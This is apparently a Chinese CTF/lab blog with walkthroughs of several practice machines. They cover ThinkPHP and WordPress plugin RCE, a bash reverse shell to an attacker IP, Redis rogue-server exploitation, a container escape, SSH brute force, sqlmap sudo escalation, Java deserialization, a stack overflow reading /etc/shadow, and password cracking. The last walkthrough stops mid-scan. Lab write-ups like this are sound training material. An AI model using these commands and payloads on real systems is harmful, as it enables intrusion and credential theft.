Inf0 - 打靶

群友靶机-exchange

2025-07-12T23:20:00+08:00

web打点靶机扫描┌──(root㉿kali)-[~] └─# nmap -sS 192.168.1.39 -p- Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-12 01:46 EDT Nmap scan report for 192.168.1.39 Host is up (0.00080s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:BD:44:E0 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds 开了22 和 80image-20250712220259253.png报错页面发现是ThinkPHP V5.0.5，直接rce getshellimage-20250712221333094.png内网横向fscan -h 172.19.0.0/24 -np ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │ └──────────────────────────────────────────────┘ Fscan Version: 2.0.0 [2025-07-12 14:17:09] [INFO] 暴力破解线程数: 1 [2025-07-12 14:17:09] [INFO] 开始信息扫描 [2025-07-12 14:17:09] [INFO] CIDR范围: 172.19.0.0-172.19.0.255 [2025-07-12 14:17:09] [INFO] 生成IP范围: 172.19.0.0.%!d(string=172.19.0.255) - %!s(MISSING).%!d(MISSING) [2025-07-12 14:17:09] [INFO] 解析CIDR 172.19.0.0/24 -> IP范围 172.19.0.0-172.19.0.255 [2025-07-12 14:17:09] [INFO] 最终有效主机数量: 256 [2025-07-12 14:17:09] [INFO] 开始主机扫描 [2025-07-12 14:17:09] [INFO] 有效端口数量: 233 [2025-07-12 14:17:21] [SUCCESS] 端口开放 172.19.0.1:22 [2025-07-12 14:17:21] [SUCCESS] 服务识别 172.19.0.1:22 => [ssh] 版本:8.4p1 Debian 5+deb11u3 产品:OpenSSH 系统:Linux 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3.] [2025-07-12 14:17:45] [SUCCESS] 端口开放 172.19.0.3:80 [2025-07-12 14:17:50] [SUCCESS] 服务识别 172.19.0.3:80 => [http] 版本:1.18.0 产品:nginx [2025-07-12 14:29:31] [SUCCESS] 端口开放 172.19.0.2:6379 [2025-07-12 14:29:36] [SUCCESS] 服务识别 172.19.0.2:6379 => [redis] 版本:5.0.14 产品:Redis key-value store fscan扫描内网 ,发现了172.19.0.2:6379跑了个redis传个frp，开个socks代理，尝试连接redis┌──(root㉿kali)-[~] └─# proxychains4 -q redis-cli -h 172.19.0.2 -p 6379 172.19.0.2:6379> info # Server redis_version:5.0.14 redis_git_sha1:00000000 redis_git_dirty:0 redis_build_id:82e99d45f54e2614 redis_mode:standalone os:Linux 4.19.0-27-amd64 x86_64 arch_bits:64 multiplexing_api:epoll atomicvar_api:atomic-builtin gcc_version:10.2.1 process_id:1 run_id:e88d7ed01f6f98ec6aacd23601cf3eb1ab6cc8df tcp_port:6379 uptime_in_seconds:1231 uptime_in_days:0 hz:10 configured_hz:10 lru_clock:7500446 executable:/data/redis-server config_file: # Clients connected_clients:1 client_recent_max_input_buffer:4 client_recent_max_output_buffer:4100800 blocked_clients:0 # Memory used_memory:854176 used_memory_human:834.16K used_memory_rss:12750848 used_memory_rss_human:12.16M used_memory_peak:4953952 used_memory_peak_human:4.72M used_memory_peak_perc:17.24% used_memory_overhead:840974 used_memory_startup:791280 used_memory_dataset:13202 used_memory_dataset_perc:20.99% allocator_allocated:1424312 allocator_active:1716224 allocator_resident:8458240 total_system_memory:2092433408 total_system_memory_human:1.95G used_memory_lua:37888 used_memory_lua_human:37.00K used_memory_scripts:0 used_memory_scripts_human:0B number_of_cached_scripts:0 maxmemory:0 maxmemory_human:0B maxmemory_policy:noeviction allocator_frag_ratio:1.20 allocator_frag_bytes:291912 allocator_rss_ratio:4.93 allocator_rss_bytes:6742016 rss_overhead_ratio:1.51 rss_overhead_bytes:4292608 mem_fragmentation_ratio:15.70 mem_fragmentation_bytes:11938672 mem_not_counted_for_evict:0 mem_replication_backlog:0 mem_clients_slaves:0 mem_clients_normal:49694 mem_aof_buffer:0 mem_allocator:jemalloc-5.1.0 active_defrag_running:0 lazyfree_pending_objects:0 # Persistence loading:0 rdb_changes_since_last_save:0 rdb_bgsave_in_progress:0 rdb_last_save_time:1752329680 rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec:-1 rdb_current_bgsave_time_sec:-1 rdb_last_cow_size:0 aof_enabled:0 aof_rewrite_in_progress:0 aof_rewrite_scheduled:0 aof_last_rewrite_time_sec:-1 aof_current_rewrite_time_sec:-1 aof_last_bgrewrite_status:ok aof_last_write_status:ok aof_last_cow_size:0 # Stats total_connections_received:2 total_commands_processed:3 instantaneous_ops_per_sec:0 total_net_input_bytes:72 total_net_output_bytes:14801 instantaneous_input_kbps:0.00 instantaneous_output_kbps:0.00 rejected_connections:0 sync_full:0 sync_partial_ok:0 sync_partial_err:0 expired_keys:0 expired_stale_perc:0.00 expired_time_cap_reached_count:0 evicted_keys:0 keyspace_hits:0 keyspace_misses:0 pubsub_channels:0 pubsub_patterns:0 latest_fork_usec:0 migrate_cached_sockets:0 slave_expires_tracked_keys:0 active_defrag_hits:0 active_defrag_misses:0 active_defrag_key_hits:0 active_defrag_key_misses:0 # Replication role:master connected_slaves:0 master_replid:20ebee4cf286daa409471774f86ee700d032f99f master_replid2:0000000000000000000000000000000000000000 master_repl_offset:0 second_repl_offset:-1 repl_backlog_active:0 repl_backlog_size:1048576 repl_backlog_first_byte_offset:0 repl_backlog_histlen:0 # CPU used_cpu_sys:0.697228 used_cpu_user:0.911468 used_cpu_sys_children:0.000000 used_cpu_user_children:0.001602 # Cluster cluster_enabled:0 # Keyspace redis未授权，尝试各种写马姿势弹shell都不行，和bamuwe交流得知 redis主机不出网可以将攻击机的端口映射到内网，也可以将内网端口映射出来 web主机上有python3的环境，直接传一个简易的nc上去import socket import threading import sys def recv_thread(conn): try: while True: data = conn.recv(4096) if not data: print("\nConnection closed by client.") break print(data.decode(errors='ignore'), end='', flush=True) except Exception as e: print(f"\nReceive error: {e}") finally: conn.close() sys.exit(0) def main(): if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} ") sys.exit(1) listen_port = int(sys.argv[1]) server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind(('0.0.0.0', listen_port)) server.listen(1) print(f"Listening on 0.0.0.0:{listen_port} ...") conn, addr = server.accept() print(f"Connection from {addr[0]}:{addr[1]} established!") t = threading.Thread(target=recv_thread, args=(conn,), daemon=True) t.start() try: while True: cmd = sys.stdin.readline() if not cmd: break conn.sendall(cmd.encode()) except KeyboardInterrupt: print("\nUser interrupted.") finally: conn.close() server.close() if __name__ == "__main__": main() https://github.com/n0b0dyCN/redis-rogue-server使用这个工具直接一把梭2025/07/12 10:59:33 CMD: UID=33 PID=760 | ./pspy64 2025/07/12 10:59:33 CMD: UID=33 PID=704 | /bin/bash 2025/07/12 10:59:33 CMD: UID=33 PID=703 | python3 -c import pty;pty.spawn('/bin/bash') 2025/07/12 10:59:33 CMD: UID=33 PID=697 | sh -i 2025/07/12 10:59:33 CMD: UID=33 PID=693 | sh -c uname -a; w; id; sh -i 2025/07/12 10:59:33 CMD: UID=33 PID=692 | md5sum 2025/07/12 10:59:33 CMD: UID=33 PID=472 | /bin/bash 2025/07/12 10:59:33 CMD: UID=33 PID=471 | python3 -c import pty;pty.spawn('/bin/bash') 2025/07/12 10:59:33 CMD: UID=33 PID=470 | php-fpm: pool www 2025/07/12 10:59:33 CMD: UID=33 PID=469 | sh -i 2025/07/12 10:59:33 CMD: UID=33 PID=465 | sh -c uname -a; w; id; sh -i 2025/07/12 10:59:33 CMD: UID=33 PID=403 | php-fpm: pool www 2025/07/12 10:59:33 CMD: UID=33 PID=32 | ./frpc -c frps.ini 2025/07/12 10:59:33 CMD: UID=33 PID=30 | /bin/bash 2025/07/12 10:59:33 CMD: UID=33 PID=29 | python3 -c import pty;pty.spawn('/bin/bash') 2025/07/12 10:59:33 CMD: UID=33 PID=28 | sh -i 2025/07/12 10:59:33 CMD: UID=33 PID=24 | sh -c uname -a; w; id; sh -i 2025/07/12 10:59:33 CMD: UID=33 PID=15 | php-fpm: pool www 2025/07/12 10:59:33 CMD: UID=33 PID=14 | php-fpm: pool www 2025/07/12 10:59:33 CMD: UID=33 PID=9 | nginx: worker process 2025/07/12 10:59:33 CMD: UID=0 PID=8 | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf) 2025/07/12 10:59:33 CMD: UID=0 PID=7 | nginx: master process /usr/sbin/nginx -g daemon off; 2025/07/12 10:59:33 CMD: UID=101 PID=6 | /usr/sbin/mariadbd 2025/07/12 10:59:33 CMD: UID=0 PID=1 | /usr/bin/python3 /usr/bin/supervisord -c /etc/supervisord.conf 2025/07/12 11:00:01 CMD: UID=0 PID=768 | runc init 2025/07/12 11:00:01 CMD: UID=0 PID=773 | rm -fv /var/www/html/exp.so 要注意服务器会定时删除so后缀的文件，将exp.so名称成一个没有后缀的文件就行www-data@0bb9bcb43160:/tmp$ python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3 < python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3 ______ _ _ ______ _____ | ___ \ | (_) | ___ \ / ___| | |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __ | // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__| | |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ | \_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_| __/ | |___/ @copyright n0b0dy @ r3kapig [info] TARGET 172.19.0.2:6379 [info] SERVER 172.19.0.3:21000 [info] Setting master... [info] Setting dbfilename... [info] Loading module... [info] Temerory cleaning up... What do u want, [i]nteractive shell or [r]everse shell: r r [info] Open reverse shell... Reverse server address: 172.19.0.3 172.19.0.3 Reverse server port: 5555 5555 [info] Reverse shell payload sent. [info] Check at 172.19.0.3:5555 [info] Unload module... $ python3 s.py Usage: s.py $ python3 s.py 5555 id Listening on 0.0.0.0:5555 ... Connection from 172.19.0.2:56334 established! uid=999(redis) gid=999(redis) groups=999(redis)成获取redis权限cat /opt/user.txt flag{user-4f6311d4cf5776f0316c2f1b6526a653}提权根据bamuwe的提示，查看web主机的数据库www-data@0bb9bcb43160:/tmp$ mysql -uroot -proot mysql -uroot -proot Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 7 Server version: 10.5.29-MariaDB-0+deb11u1 Debian 11 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> show databases; show databases; +--------------------+ | Database | +--------------------+ | hnymwl_com_utf8 | | information_schema | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.000 sec) MariaDB [(none)]> use hnymwl_com_utf8; use hnymwl_com_utf8; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [hnymwl_com_utf8]> show tables; show tables; +---------------------------+ | Tables_in_hnymwl_com_utf8 | +---------------------------+ | codepay_order | | codepay_user | | sdad3135 | | wp_allot | | wp_area | | wp_balance | | wp_bankcard | | wp_bankinfo | | wp_banks | | wp_cardinfo | | wp_catproduct | | wp_conf | | wp_config | | wp_gg | | wp_integral | | wp_klinedata | | wp_newsclass | | wp_newsinfo | | wp_opentime | | wp_order | | wp_order_log | | wp_payment | | wp_price_log | | wp_productclass | | wp_productdata | | wp_productinfo | | wp_refundlog | | wp_risk | | wp_usercode | | wp_userinfo | | wp_webconfig | | wp_wechat | +---------------------------+ 32 rows in set (0.001 sec) MariaDB [hnymwl_com_utf8]> select * from wp_userinfo; select * from wp_userinfo; +------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+ | uid | username | upwd | utel | utime | agenttype | otype | ustatus | oid | address | portrait | lastlog | managername | comname | comqua | rebate | feerebate | usertype | wxtype | openid | nickname | logintime | usermoney | userpoint | minprice | +------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+ | 1 | admin | 35a6b91de813873ca887f5d9b681d180 | | 1480061674 | 2 | 3 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | 0 | 0 | NULL | admin | NULL | 0.00 | NULL | NULL | | 5632 | 10005632 | 18aed8d2a11896a6e76180b3d87e64bb | 123456 | 1592404993 | 0 | 0 | 0 | 1 | NULL | NULL | 1597391565 | admin | NULL | NULL | NULL | 0 | 0 | 0 | NULL | www | 1597391565 | 11670.00 | NULL | NULL | | 5634 | 18888888888 | cf9c0c4996398526203b25d179b60aad | 18888888888 | 1592469112 | 0 | 0 | 0 | 666 | NULL | NULL | 1751965186 | AN | NULL | NULL | NULL | 0 | 0 | 0 | NULL | 小可爱 | 1751965186 | 680278.00 | NULL | NULL | | 5635 | 10005635 | f9fb7dcf1f8af5b50235be3cbccf90ee | 19216813711 | 1752205841 | 0 | 0 | 0 | dashazi | NULL | NULL | 1752205841 | whatcanisay | NULL | NULL | NULL | 0 | 0 | 0 | NULL | root | 1752205841 | 0.00 | NULL | NULL | | 5636 | 10005636 | cafc17ccad5b7523338f81ab912c2750 | 13333333333 | 1752296822 | 0 | 0 | 0 | 1 | NULL | NULL | 1752296822 | NULL | NULL | NULL | NULL | 0 | 0 | 0 | NULL | test | 1752296822 | 0.00 | NULL | NULL | +------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+ 5 rows in set (0.000 sec) MariaDB [hnymwl_com_utf8]> 在wp_userinfo表中发现了一个root的密码，将web代码脱下来审计，查看密码加密方式public function login() { $userinfo = Db::name('userinfo'); //判断是否已经登录 if (isset($_SESSION['uid'])) { $this->redirect('index/index?token='.$this->token); } if(iswechat() && 1==2){ //微信浏览器微信登录 if(cookie('wx_info')){ $wx_info = cookie('wx_info'); $data['openid'] = $wx_info['openid']; $checkuser = Db::name('userinfo')->where($data)->value('uid'); //判断是否已经注册 if($checkuser){ //已经注册直接記錄session $_SESSION['uid'] = $checkuser; //更新登录时间 $t_data['logintime'] = $t_data['lastlog'] = time(); $t_data['uid'] = $checkuser; $userinfo->update($t_data); $this->redirect('index/index'); }else{ //未注册则注册默认密碼为123456 $data['nickname'] = $wx_info['nickname']; $data['utime'] = time(); //$data['upwd'] = md5('123456'.$data['utime']); $data['otype'] = 0; $data['ustatus'] = 0; $data['address'] = $wx_info['country'].$wx_info['province'].$wx_info['city']; $data['portrait'] = $wx_info['headimgurl']; if(isset($_SESSION['fid']) && $_SESSION['fid']>0){ $fid = $_SESSION['fid']; $fid_info = $userinfo->where(array('uid'=>$fid,'otype'=>101))->value('uid'); if($fid_info){ $data['oid'] = $fid; } } //插入数据 $ids = $userinfo->insertGetId($data); $newdata['uid'] = $ids; $newdata['username'] = 10000000+$ids; $newids = $userinfo->update($newdata); //清除cookie 为了安全 cookie('wx_info', null); //記錄session $_SESSION['uid'] = $ids; //更新登录时间 $t_data['logintime'] = $t_data['lastlog'] = time(); $t_data['uid'] = $ids; $userinfo->update($t_data); $this->redirect('login/addpwd?token='.$this->token); } }else{ $this->redirect('wechat/get_wx_userinfo'); } }else{ //web用戶登录请求 if(input('post.')){ $data = input('post.'); //验证用戶信息 if(!isset($data['username']) || empty($data['username'])){ return WPreturn('请输入用戶名！',-1); } if(!isset($data['upwd']) || empty($data['upwd'])){ return WPreturn('请输入密碼！',-1); } //查询用戶 $result = $userinfo ->where('username',$data['username'])->whereOr('nickname',$data['username'])->whereOr('utel',$data['username']) ->field("uid,upwd,username,utel,utime,otype,ustatus")->find(); //验证用戶 if(empty($result)){ return WPreturn('登录失败,用戶名不存在!',-1); }else{ if(!in_array($result['otype'], array(0,101))){ //非客户无权登录 return WPreturn('您无权登录!',-1); } if($result['upwd'] == md5($data['upwd'].$result['utime'])){ if ($result['ustatus']==0) { $_SESSION['uid'] = $result['uid']; //更新登录时间 $t_data['logintime'] = $t_data['lastlog'] = time(); $t_data['uid'] = $result['uid']; $userinfo->update($t_data); return WPreturn('登录成功!',1); }elseif($result['ustatus']==1){ return WPreturn('登录失败,您的账户暂时被冻结!',-1); }else{ return WPreturn('登录失败,用戶名不存在!',-1); } } else{ return WPreturn('登录失败,密碼错误!',-1); } } } return $this->fetch(); }加密密码是 md5(pass+时间戳)可以写脚本爆破，也可以不写，群里直接提示了密码是managername字段下的whatcanisay登录到redis主机的rootcat /proc/self/status |grep Cap CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000003fffffffff CapAmb: 0000000000000000猜测这应该是个特权容器ls /dev/ | grep sda sda sda1 sda2 sda5 mount /dev/sda1 /mnt cd /mnt ls bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old cd root ls root.txt cat root.txt flag{root-6dbfaf239023f6da6ed2ffc59d3bcea5} 将sda1挂载上，发现这就是主机的目录，成功逃逸

群友靶机-New

2025-07-02T20:00:00+08:00

web打点image-20250702082959738.png发现是wordpress 随便点几下跳转了http://new.dsz 改个hostswordpress的话就走正常流程，wpscan扫用户爆破密码先整上，发现没什么成果image-20250702083232613.png发现用了Social Warfare v3.5.2插件，随便一搜就找到rce https://github.com/hash3liZer/CVE-2019-9978┌──(root㉿kali)-[~] └─# cat payload

system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.37/4444 0>&1'")

┌──(root㉿kali)-[~] └─# python2 wp.py -t http://new.dsz --payload-uri http://192.168.1.37/payload [>] Sending Payload to System! ┌──(root㉿kali)-[~] └─# nc -lnvp 4444 listening on [any] 4444 ... connect to [192.168.1.37] from (UNKNOWN) [192.168.1.36] 33860 bash: cannot set terminal process group (430): Inappropriate ioctl for device bash: no job control in this shell www-data@New:/var/www/new.dsz/wp-admin$ 成功getshell提权www-data@New:/home$ cd /opt cd /opt www-data@New:/opt$ ls ls andeli_cred www-data@New:/opt$ 在opt下有个andeli_cred可执行文件，执行输出一堆类似md5的值，尝试用这些字符串去爆破andeli用户┌──(root㉿kali)-[~] └─# hydra -l andeli -P 1 ssh://192.168.1.36 -vV -f -t 10 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-01 20:26:03 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 10 tasks per 1 server, overall 10 tasks, 10001 login tries (l:1/p:10001), ~1001 tries per task [DATA] attacking ssh://192.168.1.36:22/ [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [INFO] Testing if password authentication is supported by ssh://andeli@192.168.1.36:22 [INFO] Successful, password authentication is supported by ssh://192.168.1.36:22 [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "固定MD5插入位置: 665" - 1 of 10001 [child 0] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "eea0353df30b9b38f5f280db88912f91" - 2 of 10001 [child 1] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "e31195e88f31a699c9c499f129248b56" - 3 of 10001 [child 2] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "f788c604535faf9685a1ea30355b1a20" - 4 of 10001 [child 3] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1a8d0816b7556ebe36f2022387e92093" - 5 of 10001 [child 4] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "a11b921496af55d8bdabfde74d06d9a8" - 6 of 10001 [child 5] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "ab33d487a26f748312e0fd84a8a724fc" - 7 of 10001 [child 6] (0/0) ............................ [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5cca227ce87f76ad1728abcfbb0dd792" - 658 of 10001 [child 6] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "35d57416c953f0007381e409006d700a" - 659 of 10001 [child 1] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5dfd113da80981a0421272c7224a2448" - 660 of 10001 [child 6] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "145258ff008912955a7cc33f6798cd0d" - 661 of 10001 [child 9] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1506df5efe700055ad170466cff8cf5e" - 662 of 10001 [child 2] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "55425a0487587ae27f984fe0ed8add82" - 663 of 10001 [child 9] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "3d4875cfc174c5635fb9ea9c7164ef61" - 664 of 10001 [child 2] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "cb93062c7903f67452d3c6f476855f71" - 665 of 10001 [child 7] (0/0) [ATTEMPT] target 192.168.1.36 - login "andeli" - pass "9eeb22195b4eb7a35bcad0f45761eb7b" - 666 of 10001 [child 9] (0/0) [22][ssh] host: 192.168.1.36 login: andeli password: 9eeb22195b4eb7a35bcad0f45761eb7b 登录ssh，三板斧，找一下suid，没发现可利用的看一下sudo -landeli@New:~$ find / -perm -4000 2>/dev/null /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/mount /usr/bin/su /usr/bin/umount /usr/bin/pkexec /usr/bin/sudo /usr/bin/passwd /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/libexec/polkit-agent-helper-1 andeli@New:~$ sudo -l Matching Defaults entries for andeli on New: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User andeli may run the following commands on New: (ALL) NOPASSWD: /usr/bin/sqlmap可以用root执行sqlmapandeli@New:~$ sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')" ___ __H__ ___ ___[)]_____ ___ ___ {1.5.2#stable} |_ -| . ["] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 20:43:51 /2025-07-01/ [20:43:51] [INFO] testing connection to the target URL # id uid=0(root) gid=0(root) groups=0(root) #

yulian

2025-06-30T00:20:00+08:00

web打点image-20250625125350343.png模拟终端执行image-20250625125435114.png查看/opt/code/test.c 文件伪随机，跑代码得到三个数 image-20250625125627753.png用这三个数进行端口敲门，就会开放8080端口image-20250630003121432.png访问8080，密码爆破 admin/123457目录扫描，发现接口/download对参数进行爆破，爆破出参数为file，可以任意文件读取读取/proc/self/maps 查看内存image-20250625130035544.png找到/app/javaserver-0.0.1-SNAPSHOT.jar使用这个接口读取jar反编译发现反序列化接口image-20250625130317874.png直接打CommonsCollections链子使用ysoserial生成反弹shell payloadimage-20250625130758468.pngimage-20250625130932791.png带上cookie发送payload getshell内网横向上传frp 搭建socks代理使用fscan 等工具扫描内网主机扫描到内网主机172.17.0.2，开起来80和22image-20250630003224744.png查看80端口，是一个关于暴力破解的讲解，在最底下有一个注释内容500-worst-passwords这是seclists中的一个字典，使用这个字典去爆破root@172.17.0.2 root/mountainssh连上去在/usr/bin中发现可疑文件 userLoginimage-20250625131839654.pngida分析image-20250625132049440.png文件加密函数跟进去image-20250625132126112.pngimage-20250625132132053.png标准的xtea加密image-20250625132213818.png找到key和输出的文件因为是常量定义的key 和读取的文件的文件名，这里ida分析将这两值合在了一起xtea的key为16位，分成4组进行加密key-for-user-ldz是key ， id_ed25519是读取的文件名很明显是一个私钥，写脚本解密output.encimage-20250625132545311.png找到这个文件在/etc/下提取出来解密#include #include #include #include #define BLOCK_SIZE 8 #define ROUNDS 64 const char FIXED_KEY_STR[16] = "key-for-user-ldz"; const char *INPUT_FILE = "output.enc"; const char *OUTPUT_FILE = "decrypted.txt"; void xtea_decrypt(uint32_t v[2], const uint32_t key[4]) { uint32_t v0 = v[0], v1 = v[1]; uint32_t delta = 0x9E3779B9, sum = delta * ROUNDS; for (int i = 0; i < ROUNDS; ++i) { v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]); sum -= delta; v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]); } v[0] = v0; v[1] = v1; } void key_from_fixed_string(uint32_t key[4]) { for (int i = 0; i < 4; ++i) { key[i] = ((uint32_t)FIXED_KEY_STR[i*4]) | ((uint32_t)FIXED_KEY_STR[i*4 + 1] << 8) | ((uint32_t)FIXED_KEY_STR[i*4 + 2] << 16) | ((uint32_t)FIXED_KEY_STR[i*4 + 3] << 24); } } void decrypt_file() { FILE *fin = fopen(INPUT_FILE, "rb"); FILE *fout = fopen(OUTPUT_FILE, "wb"); if (!fin || !fout) { perror("文件打开失败"); exit(1); } uint32_t key[4]; key_from_fixed_string(key); uint8_t buffer[BLOCK_SIZE]; size_t read_size; while ((read_size = fread(buffer, 1, BLOCK_SIZE, fin)) == BLOCK_SIZE) { uint32_t block[2]; memcpy(block, buffer, BLOCK_SIZE); xtea_decrypt(block, key); fwrite(block, 1, BLOCK_SIZE, fout); } fclose(fin); fclose(fout); printf("解密完成：%s → %s\n", INPUT_FILE, OUTPUT_FILE); } int main() { decrypt_file(); return 0; } 查看解密完的文件image-20250625132820366.png是个私钥，设置权限600 ，根据解密的key，可以得知是用户ldz的私钥登录这个用户image-20250625133012806.png提权localhost:~$ find / -perm -4000 2>/dev/null /opt/vuln /bin/bbsuid查看suid有个vuln，ida分析一下image-20250625133214597.png让flag=1就能执行secret()函数image-20250625133252635.png这个函数读取/etc/shadow这里很明显是一个栈溢出覆盖flag的值，进行判断绕过payload:localhost:~$ python -c "print('A'*44 + '\x01\x00\x00\x00')" | /opt/vuln root:$6$W5FUwrTeo8vXfNot$qJazigaYSqk8ezVfjHckZb2XjxkrJsniQa5MA1o.j9apE1BMYX5vYuJVEJ2hYbNsR0q9IWOSSt1I40vNYxvKO0:20263:0::::: bin:!::0::::: daemon:!::0::::: lp:!::0::::: sync:!::0::::: shutdown:!::0::::: halt:!::0::::: mail:!::0::::: news:!::0::::: uucp:!::0::::: cron:!::0::::: ftp:!::0::::: sshd:!::0::::: games:!::0::::: ntp:!::0::::: guest:!::0::::: nobody:!::0::::: klogd:!:20205:0:99999:7::: chrony:!:20205:0:99999:7::: ldz:$6$qCU7eP8wj/Pvo1FB$Ooou6p.TF3M/kMB29XrzQ6XVNbq7c46lGzNvRPOJ55GAXJ0h.jmbc8VHhGjFgwXLHPSbNt96l/rmUYgDqpo8Y0:20263:0:99999:7::: nginx:!:20263:0:99999:7::: 成功读取shadow爆破得到root密码┌──(root㉿kali)-[~] └─# john --format=sha512crypt --wordlist=rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) No password hashes left to crack (see FAQ) ┌──(root㉿kali)-[~] └─# john hash --show root:yulianateamo:20263:0::::: 1 password hash cracked, 0 left ┌──(root㉿kali)-[~] └─# ssh root@10.20.73.10 root@10.20.73.10's password: localhost:~# localhost:~# localhost:~# ls root.txt localhost:~# cat root.txt flag{98ecb90d5dcef41e1bd18f47697f287a} localhost:~#

hackingtoys

2024-09-16T21:30:00+08:00

信息收集nmap扫端口nmap -sS 10.20.73.121 -T4Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:48 EDT Nmap scan report for hacktoys.lan (10.20.73.121) Host is up (0.00010s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 3000/tcp open ppp MAC Address: 00:0C:29:82:76:43 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds开了22 和 3000端口，nmap -sV 扫详细服务nmap -sV 10.20.73.121 -p3000,22┌──(root㉿kali)-[~] └─# nmap -sV 10.20.73.121 -p3000,22 Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:49 EDT Nmap scan report for hacktoys.lan (10.20.73.121) Host is up (0.00031s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) 3000/tcp open ssl/ppp? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3000-TCP:V=7.93%T=SSL%I=7%D=9/16%Time=66E7E361%P=x86_64-pc-linux-gn SF:u%r(GenericLines,3EF,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Len SF:gth:\x20930\r\n\r\nPuma\x20caught\x20this\x20error:\x20Invalid\x20HTTP\ SF:x20format,\x20parsing\x20fails\.\x20Are\x20you\x20trying\x20to\x20open\ SF:x20an\x20SSL\x20connection\x20to\x20a\x20non-SSL\x20Puma\?\x20$Puma::H 